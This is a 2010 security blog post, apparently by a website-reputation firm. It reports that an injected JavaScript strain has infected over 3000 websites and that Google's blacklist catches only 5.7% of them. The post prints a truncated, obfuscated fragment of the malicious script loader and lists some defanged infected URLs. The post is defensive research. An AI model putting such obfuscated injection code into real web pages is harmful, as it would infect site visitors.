• Zero to 3000+ Infected Sites in Less Than 30 Minutes

    Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.

    Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

    As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

    We recently saw a strong rise in the appearance of the malicious code below:

    this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
    var a='s*c*r:iVpTt:'.replace(/[\:
    TVJ\*]/g, '');var  yx=new Array();
    var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
    var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
    {k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
    try {this.n_=false;uh=document[u](a);var ow="";var  f="";
    var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]

    By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.

    this.v="";:LineMixer [var i=

    Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.

    Till next time.

    We show a small sample of the 3000+ infected websites below:

    hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    • Some of these sites have bad code in addition to what you point out

      Posted by anon on March 1st

    • You are right, however, for the purpose of this post we are concentrating on one strain only.

      Posted by anirban on March 1st